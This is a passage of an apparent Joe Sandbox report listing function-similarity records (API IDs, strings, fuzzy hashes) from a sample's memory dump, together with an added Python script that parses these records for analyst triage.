• Instruction Fuzzy Hash: 2B21517260CAA192F724FB10F5506DA7364FB89788F400136EADD93B98DF7CD5468B40
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
• Instruction ID: 3891df918236542e21a933cb94d5bbda2276a66832b62c853e2cb9478c37822d
• Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
• Instruction Fuzzy Hash: 7231B43661CF9295EB64EF25E8802AE33A4FB89758F540135EA9D83B98DF3CC545CB00
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
• Instruction ID: 37b713b53cc68f08942d79398f14ce3f1865504be49422b01fcfef59d1de5146
• Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
• Instruction Fuzzy Hash: 7BB1D522B1C6A291EA68BB61D6101BD6395FB46BECF446131EE6D97BC5DF3CE841C300
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
• Instruction ID: d03305e209f12da7931db38f9328676fcaee51668232bcff120ac439f25be5d2
• Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
• Instruction Fuzzy Hash: 39114826B18B169AEB00EF60E9442AC33A4FB59758F040E31DE2D86BA4DF78D1988340
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
• Instruction ID: cd5727578f247cf2275260863d85fa31ef83c92fd3adcf9b8135b3dfca9dabe0
• Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
• Instruction Fuzzy Hash: 84C12672B1D69697D728EF19A2886AEB795F789788F408135DB5E83744DF3DE800CB00
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID: $header crc mismatch$unknown header flags set
• API String ID: 0-1127688429
• Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
• Instruction ID: b68cc838592034025f94e81283f4ab3eaa476e32aa06f693e99a7dd1df610f58
• Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
• Instruction Fuzzy Hash: 18F17D62A1C3E59BE7A5FB19C088A3A3AA9FF45740F055538EA4D877D1CF78E940C780
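The records above are the per-function similarity entries Joe Sandbox emits for the main module dump: an "APIs" or "Strings" label naming the evidence used, the dump the function was recovered from, the IDA plugin snapshot, and the API ID, String ID and fuzzy hashes that identify the function. Reading them by hand across a report of this size is slow, so below is an added example, written for this page and not code from Joe Sandbox or the report, that parses this record layout into structured objects and lets an analyst query it: list the strings and API tokens per function, find the function that carries a given string, and separate statically linked runtime code from the sample's own logic. The KNOWN_LIBRARY_STRINGS mapping is an analyst-supplied assumption rather than something the report states (the two messages it lists are the header-check errors from zlib's inflate code); the sample text is constructed from two of the records above, including the "Download File" link residue the parser strips.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two of the records above, in the report's own layout.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message$ErrorFormatLast
• String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
• API String ID: 3971115935-1149178304
• Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
• Instruction ID: 254e0af54bfeede140830f3e6c79a011187cf6447a103088df4033657765c7e9
• Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
• Instruction Fuzzy Hash: 2B21517260CAA192F724FB10F5506DA7364FB89788F400136EADD93B98DF7CD5468B40
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID: $header crc mismatch$unknown header flags set
• API String ID: 0-1127688429
• Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
• Instruction ID: b68cc838592034025f94e81283f4ab3eaa476e32aa06f693e99a7dd1df610f58
• Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
• Instruction Fuzzy Hash: 18F17D62A1C3E59BE7A5FB19C088A3A3AA9FF45740F055538EA4D877D1CF78E940C780
"""

# "• Key: value" lines; headings without a colon (Memory Dump Source, Similarity) do not match.
FIELD_RE = re.compile(r"^\s*[•*-]?\s*([A-Za-z ]+?):\s*(.*)$")

# Analyst-supplied attributions for well-known library strings (assumed, not from the report).
KNOWN_LIBRARY_STRINGS = {
    "header crc mismatch": "zlib inflate",
    "unknown header flags set": "zlib inflate",
}


@dataclass
class FunctionRecord:
    kind: str                                   # "APIs" or "Strings": the evidence the similarity used
    fields: dict = field(default_factory=dict)  # Source File, Snapshot File, API ID, hashes, ...
    associated: list = field(default_factory=list)

    @property
    def strings(self):
        """The '$'-separated String ID, with the empty leading element dropped."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def api_tokens(self):
        """API ID as '$'-separated groups of CamelCase tokens; lowercase CRT names stay whole."""
        return [re.findall(r"[A-Z][a-z]*|[a-z_]+", g) for g in self.fields.get("API ID", "").split("$")]


def parse_records(text):
    """Turn the report's record layout into FunctionRecord objects; text before the first
    'APIs'/'Strings' label (section headings, a record cut off at the page start) is ignored."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            current = FunctionRecord(kind=line)
            records.append(current)
            continue
        m = FIELD_RE.match(line) if current is not None else None
        if not m:
            continue
        key, value = m.group(1), m.group(2).removesuffix("Download File").strip()
        if key == "Associated":
            current.associated.append(value)
        else:
            current.fields[key] = value
    return records


def find_by_string(records, needle):
    """Functions whose String ID contains needle, case-insensitively."""
    return [r for r in records if any(needle.lower() in s.lower() for s in r.strings)]


def attribute(record):
    """Library a record's strings point to under KNOWN_LIBRARY_STRINGS, else None."""
    for s in record.strings:
        for needle, lib in KNOWN_LIBRARY_STRINGS.items():
            if needle in s:
                return lib
    return None


def summary(records):
    """One row per function: evidence kind, attribution, API ID, instruction fuzzy hash prefix."""
    return [(r.kind, attribute(r), r.fields.get("API ID", ""),
             r.fields.get("Instruction Fuzzy Hash", "")[:16]) for r in records]


if __name__ == "__main__":
    for row in summary(parse_records(SAMPLE)):
        print(row)
```

Feed the whole execution-graph section of a report to parse_records and the summary rows give a quick triage list: functions attributed to a known library can be skipped, and the remaining records' strings and API tokens point at the sample's own code. Because the Opcode ID and Opcode Fuzzy Hash are identical in every record on this page, either field works as the key when correlating functions across reports.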
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
Strings
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
Strings
Similarity
• API ID:
• String ID: incorrect header check$invalid window size
• API String ID: 0-900081337
Strings
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
Strings
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                                            • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                                                                                                                                            • Instruction ID: 36bfa4b50cead5a5bd0a3d3b1ddac3be11f7be548df40e15b87a432a4f5a9667
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AB09224E0FE96D2EA0C3B116D9621822A5BF88710FA48038C41C81320DE3C20A58B00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                                                                                                                                            • Instruction ID: 336e8f564976c9158b8518c6aee3c7b045aeb8a5b55644423ca815c23e672e1e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1D1D272E0C662E6EB78FE29865067D37AAEB45B48F144235CE0D87B95DF39E841C700
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                                                                                                                                            • Instruction ID: 45c5f041115dfadb63780dd9e3dd4908490e114eb674a5fef64bb9c898b31155
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C1B0722182F18FD289FB29E45957A73E1F798309BD4402AEF8747B85CA3CE415D790
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                                                                                                                                            • Instruction ID: b04325a08f3175496b8dd0cefda34254d0f4333d9266304a8b235d24ec12a877
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5B1AD7290C7A5EAE765EF29C15023C3BAAE749B48F250235CB4E87B95CF39E441C705
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                                                                                                                                            • Instruction ID: 89454708fc1293e8136b71d938ce85a9ae3543bd287ddbdb76430738bf94bdf9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A681D172A0C791D6EB74FF19A44036A7A97FB89794F144235DA9D83B99CF3CE5408B00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
• Instruction ID: 77121a806d9165bea2c7aaba9a9a6fb1808540df820670c2051d5efaa22095cf
• Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
• Instruction Fuzzy Hash: 4261FA22E0C2A2A6F76CBA28861463E6681EF43778F144639DA7DC67D1DE7DE840C700
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction ID: 47e1752d72a26e8e4a54a1118d5733f31ee3a540483ce2786929be256c82dd77
• Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction Fuzzy Hash: 2A517476A1C661E6E724AB29C04423837A6EBD5B5CF245135CA4E977B4CF3AE842C740
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction ID: 7c82808dda6c25efef3f1126cbad555eb67c408fb4bf447356964eac5c37f20f
• Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction Fuzzy Hash: A2516376A1C6A1D6E724AB29C04433937A6FB95B68F244231CF8D97795CF3AE843C740
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction ID: 36f0126b488c0b6e6ae175e5f0f31631de28970dc0926d135239e879a17267fc
• Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction Fuzzy Hash: 7E517536A1C6B1D6E724AB29C04423837A6EB89F58F244135CE4D977E4CF7AE843C740
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction ID: cf07589b2d742e0f159bd812ff734021459defd5dd3c1882d2c8309a520b2f04
• Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction Fuzzy Hash: 6A517036B1C661D6E725AB29C04023D77AAEBC5B58F254131CE4D97BB8CF3AE842D740
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction ID: 99dd1c8235f2189647ba3b38af4aaf252857bb7f3fbef9220399fe4511cf4bb1
• Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction Fuzzy Hash: 93517E76A1D661D6E724BB29C04023937AAEB94B58F284131CF4D977A9DF3AE843C740
